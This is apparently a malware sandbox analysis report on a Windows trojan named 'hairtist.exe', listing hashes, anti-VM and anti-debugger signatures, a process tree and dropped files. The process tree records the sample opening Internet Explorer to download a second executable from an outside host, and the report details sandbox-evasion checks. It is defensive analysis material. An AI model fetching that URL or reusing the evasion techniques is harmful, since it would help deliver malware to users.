Overview

overview

9

Static

static

3

hairtist.exe

windows7-x64

9

hairtist.exe

windows10-2004-x64

9

Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    28-04-2024 10:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    hairtist.exe

  • Size

    4.8MB

  • MD5

    8bdb368fe2ccdd70d3f0f4fe1b69b080

  • SHA1

    ea6f62f0aa53c921d579e1c50fcf2f68e2b2dbf1

  • SHA256

    91b861cdf4a5f60b3d40b48e9357fc8e586f203022d22345764be5035e2fe724

  • SHA512

    0ba49b2cc9f5615eadb18fdbcb319bc4191b9e56817814dd8ec279d7c7eb592e7f42e6054f4eed6a09763bbd74df802188fa2a84d9a1542b1df233de5c511cd6

  • SSDEEP

    98304:3y3Raqqrq5TliunkEY4W4GuY2j3TrVkomgsCuf9R624jTqekgjyVKRj1h:ovllFkE5VlTPKpgsCuf16qe3xb

Score
9/10
evasiontrojan

Malware Config

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 37 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\hairtist.exe
    "C:\Users\Admin\AppData\Local\Temp\hairtist.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: RenamesItself
    • Suspicious use of WriteProcessMemory
    PID:2904
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\hairtist.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2200
      • C:\Windows\system32\certutil.exe
        certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\hairtist.exe" MD5
        3⤵
          PID:3012
        • C:\Windows\system32\find.exe
          find /i /v "md5"
          3⤵
            PID:1816
          • C:\Windows\system32\find.exe
            find /i /v "certutil"
            3⤵
              PID:2036
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" https://downloadloaderst.com/tpmphana.exe
            2⤵
            • Modifies Internet Explorer settings
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2648
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2648 CREDAT:275457 /prefetch:2
              3⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:2748

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
          Filesize

          914B

          MD5

          e4a68ac854ac5242460afd72481b2a44

          SHA1

          df3c24f9bfd666761b268073fe06d1cc8d4f82a4

          SHA256

          cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

          SHA512

          5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
          Filesize

          1KB

          MD5

          a266bb7dcc38a562631361bbf61dd11b

          SHA1

          3b1efd3a66ea28b16697394703a72ca340a05bd5

          SHA256

          df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

          SHA512

          0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
          Filesize

          252B

          MD5

          9ffbc7d87e6cd3c53121899eb6a28fca

          SHA1

          eb4fefb7dcc885d83f8e3d0f1926d23efe3f7f90

          SHA256

          cc046b829d3b14a17daf5eea1d452be031fbc689303b0850aedb8926c520f24d

          SHA512

          8ae56c9b3e536a6317fa8c0312c4ee6660504510d62a2b2525103688331d64a03ca7d3f4fad4951dd440d13c1b095b86f66399428be568dc0de85eeb4ed0d41c

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          ad2bab54af03d5cd3a8247865609e576

          SHA1

          b29c8a42fabc0bc8950ed375e576ca0813fc6eb7

          SHA256

          b7bae5f51d71b9276ac46f02ce5ca6db2a8220ff89841973565b106622c4a14c

          SHA512

          b853d32cdb695d65d36c161425a18fe95462ed0b86015ad0edc9c256c8d935a00df94cb7fa195acd57a1e4eb94589a1b5dc9a24e80d0a4302155bc6367b439ec

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          a57ddc3e8a4372872a0595276f8d8f2b

          SHA1

          ffd4537976c579779e7fbe2d0d9ff0c09732ade5

          SHA256

          30103c062b016efede68151901effc7ed938c4e232357dc2668dd132fc088629

          SHA512

          6ab67e664e5c6849fd4b9485e3b8d80985151d6141cd711dd809d357253ede56d433eb7f9ddc4c0b4e1ba2daa6de2d5046e7122fdbef47791538cd30429be21a

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          07823e9ca5342b5ad8d78f809248af2d

          SHA1

          fb8bcff46eb671de320072e70be73defe3fcd067

          SHA256

          385d99ffceddb9fe16a2f1836b5618bcd0d2051991633f0da99c1f38d92043e9

          SHA512

          43642778592678fa6d20c6ca647b561fbeed46b7eec30b1f17100b4962ad478bba870b50e75ebbb3950b24410e27aac52123ffd6fd5c4929af0facd2feffb718

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          ccc051b8c615c7bfaba48e2764f19717

          SHA1

          ef488cb3ce5ceb9271ae7d94fbecf60983f5ed86

          SHA256

          fc0766b6e9d8e3d49c70eb388b378a5f5b93e332975a034e68318aa1ecfac44a

          SHA512

          7f7b7f11a76a8cb5440c25e1b20dfdecab528c5cc855c00f45ae6c380348280c7c5fc419742fada2c522798e7e6ac306022504ba44a9b2c6168498dd13126f5e

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          d5b1cb7d5cf0688e5f78815ee6c18f45

          SHA1

          c0b97c4df21f737aa5d18496188ba200a7be444b

          SHA256

          5f4c1404d3bf9995b8a54a5f20b1e71a8951211317f5a099dcca94c78e877431

          SHA512

          7f51eab91aabebfd4c15bc5de817f5c2d61a66c145ba81a8ebcd009c418c742fc005974dad2d027ec819706b2d18101f17f36a7069436b3ae4b9b10a418b0f77

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          5e23c4f0472c4f954f747c039b59c5e1

          SHA1

          10bb565be9f0b54380a8f47f683a9cd69f69b5c5

          SHA256

          3e2859b5a66c4d60061bd4b2468731f895d7f24f88510e9a533617fb6aa5ada6

          SHA512

          34f321a5add5c40128f0def588d4b0bc000c05c99e71b19ca3ccec5f26d22b448cd8b43e9e5dbfcb50b4924af5fd795ae0daf4c00e772a66b7e541e323dc4d90

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          6a2aee5daa1fa9df4e9804e75ca2423a

          SHA1

          29281894a4a828185a77b8290e8341654696dd0e

          SHA256

          a5cfab8f0965524da970c7f3064c389961dac6b971ed800ce532908b7a6a950b

          SHA512

          865cf91c6fdb2a38b603d492f0582f6f4b7fb56aaf1326714bbbf607c0789979a233652c143769440f75fb1a1d6e81a078b375d180af708f2a884d56ac417a46

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          fa9cc2226c967fcb01b204452e5f41c4

          SHA1

          15955105e1282c53673a2118e1cfe6a068e5f4fc

          SHA256

          17fa1ff31a835bcc2688c7677c1382c29fc382abb3bd747d3133950e2d7d5f20

          SHA512

          1a9738b64b5b6ea5bd633ecb5452873863bba94e70423a7e9e42ece3973b77d7b25c55f88c35420d279b23e84fcc2a962841509827bb8cc20b3aad40446d9d7a

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          23fd93c96179e35c3d9440b1157411e2

          SHA1

          67a7dcf774cf290d3d0642d9828d1722e1ecd7c7

          SHA256

          b3ea97cfc1cd5f5a85417be03b5c1caf105fa22f3c16ce2f6955e8dd7d973c09

          SHA512

          542295b7575e2dfddde8a405bb50c4df438f00e8fdac87dfb315bfe99f651f5785a08b40afffee268d88e3c7ed7c77e47a64ec7c75674869d24f0d92b30df813

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          6bb07cebe66038f4141959f4190509b6

          SHA1

          a0514957bbd9154a78b02d4fdd83e8e09a715efe

          SHA256

          a6bd8b960afdad8be6e98c392dd919f73ef6c3f66c12aa070e87a664c709d3c6

          SHA512

          003ebd1122631f98bce6514946882ac6ba3f49dbd31211d6251c866367b7e358b9df0c14ea07f3e5944bc7db1beb377cce7e5c2f3765ff378aa2520a852782cd

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          4e9b91eb9f62b45dab3f079c8d169183

          SHA1

          45369cde8e4c1ee69696b940ea07027ec31793dc

          SHA256

          d9e954ad10ccce9db99a6387dd9755f6fe50731410748e28ed1070cc9545d8b3

          SHA512

          d7e5878547a673c3c6043071ec31f23ee943098d44054eafbefcb0423665317ce1357d0d9f45ccdaa51d1e8d909ad339e1b6e7d204c116110c812788eb65c84e

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          1c08d5c72b260e39ab3845322236478e

          SHA1

          6e1d72d1528b876fdcf09a2ceb6cd62bdcb8a0a7

          SHA256

          130a2d72870c5ecea32212eb9fd10bbd1d893fc140e6f3af3baf6533be303b70

          SHA512

          ebc0727c55ac4e1a90c802361e5cd3b6a0202adbca65882b3d0efc0bf4406c5f8e9ed458028049c4e428219d41dfc974ac6c32338a763351d6a90098dd373c81

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          33ba3c3789b59686ff8048ff1f56ea2b

          SHA1

          43fcb987ccc7d36e5b00ae3d80f06f203c83809b

          SHA256

          a5164d783843b1c1b4b30e47e1a8e26ec4b7f6a1186697a3ec4eda4898a7241f

          SHA512

          e8d5e977d33f0061bdd68f10711320d6bf2b041292fd6d23ce010a847186412652b1d4ce566f4950220899ef5301ff2a375bbb78aed06f1f0df2d76160bdda7f

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          a999fca940289f8ed4c6949a7bab3132

          SHA1

          5dcc5e54a0295b99f9d0a7a13cbea44297a628f1

          SHA256

          ebb3e77b20054ad8a435946d40b47e249ee84d62ac910701d4a0f9b8a9b4ca18

          SHA512

          766c8f1b2db029dc26ec66af5b033ad415b98e6c9b7ccb5c97f644d00c90d2ed2ce1b7eab1ff92cc1ee1e7e8905e7f4fa09f4ddbdd774be0bc877f43f4356804

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          e9734a838458617506256c5657e44d79

          SHA1

          9ba376b8ac9f23e65f61e50cf190131ea7de6a2d

          SHA256

          a10d1d7eb9518bca25b4228f85eb2c8d34be84ba4b6447b115e389e4209c010b

          SHA512

          244a5e9ae10ab0a529752d7bb382720593a903aa1a746728ec426906c4ac3550f34aabd20f26e149d6a2a0d025cb5bb2c9d8e94a9982c844d02c7597de929fbb

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          e4508c7376d01ae304d0be7e272c7566

          SHA1

          b4cdef8d703013081685a538b2186da688bdcb77

          SHA256

          1dad1aaf6d463f2f19fdb361ef573a91fc291fecb3a786958e3df0fcb46eef87

          SHA512

          5a470094b79cc5fffb088f2159b4b27eaaab2ce1d6e055850f9b54926294da858fece40736c0b223a73dccb707f9879e9e73720408248731b4e38e097ec763ef

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          b9ef1aa1dbe19c5e7386d3dcf429ae08

          SHA1

          edd65a7a67a14c516a67b5f85840b005639350fd

          SHA256

          bb735ae4d5053450a48da818107b73b6415795693d8cd176b2d4f8bd229e1bd7

          SHA512

          14eb4cabe98956bf5f4066d9cec18377fc01f2d3ec257c3cf995f327928924b809daa0017725fe7aadcea601aaa021ef74f382511ee8a4a12ee7fbd0bbf860d3

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          7b5315d6498e8272fb01bd7d9fa12dba

          SHA1

          bd051ccff674b83fbe91167129319478e37a1572

          SHA256

          f26d780d36f9ee10164f362efe0324d705321e7986fae8f6796391df4d8eb9a0

          SHA512

          eb2dc5627fdfd04461e2fcdef4dd3e94779b5a6750b494fa43695bd18044fddd64aaae62349e9ff1485776f924c9b2488c08af31ec24b1703b2b622daa488de0

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
          Filesize

          242B

          MD5

          6fe7552c11f4cc36a8ac97f84a297efd

          SHA1

          024fac2d7246d1559407fd49abfd8751be968b79

          SHA256

          474897b3ff795ad9d6968bf1632ea5cef272bf2580721d086e4e63ae7fc11378

          SHA512

          de2c1074202faa3f111138334cc86055788a14ef4b65be5cc7918963a83c525fdf5602bc72284f1bca58f303e2ac2121885374e052785c4e184bc90da5370fdc

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\Cab59A7.tmp
          Filesize

          68KB

          MD5

          29f65ba8e88c063813cc50a4ea544e93

          SHA1

          05a7040d5c127e68c25d81cc51271ffb8bef3568

          SHA256

          1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

          SHA512

          e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\Tar5A18.tmp
          Filesize

          177KB

          MD5

          435a9ac180383f9fa094131b173a2f7b

          SHA1

          76944ea657a9db94f9a4bef38f88c46ed4166983

          SHA256

          67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

          SHA512

          1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\~DFAAC06479771A2ADC.TMP
          Filesize

          16KB

          MD5

          6dad87a974801dc4e29f17234b9aae17

          SHA1

          e07ab1e6622be72866d235cf9a79ad437e109f3a

          SHA256

          2073177f52b109a9891208bc9fce88988587ef8f6d5f8f89486620785a1670f4

          SHA512

          c8b02864465e683d8a5344b496250d72fff0ab946989a77bc8c8df2f9a2d4dc05308a872fd5d371035f7b05ff7950248bed792ae428dded8962f66ddc4f4149b

          Download Submit

        • memory/2904-0-0x0000000140000000-0x0000000140C11000-memory.dmp

          Filesize

          12.1MB

          Download

        • memory/2904-2-0x0000000140000000-0x0000000140C11000-memory.dmp

          Filesize

          12.1MB

          Download

        • memory/2904-3-0x0000000140000000-0x0000000140C11000-memory.dmp

          Filesize

          12.1MB

          Download

        • memory/2904-1-0x00000000772C0000-0x0000000077469000-memory.dmp

          Filesize

          1.7MB

          Download

        • memory/2904-4-0x0000000140000000-0x0000000140C11000-memory.dmp

          Filesize

          12.1MB

          Download

        • memory/2904-8-0x00000000772C0000-0x0000000077469000-memory.dmp

          Filesize

          1.7MB

          Download

        • memory/2904-7-0x0000000140000000-0x0000000140C11000-memory.dmp

          Filesize

          12.1MB

          Download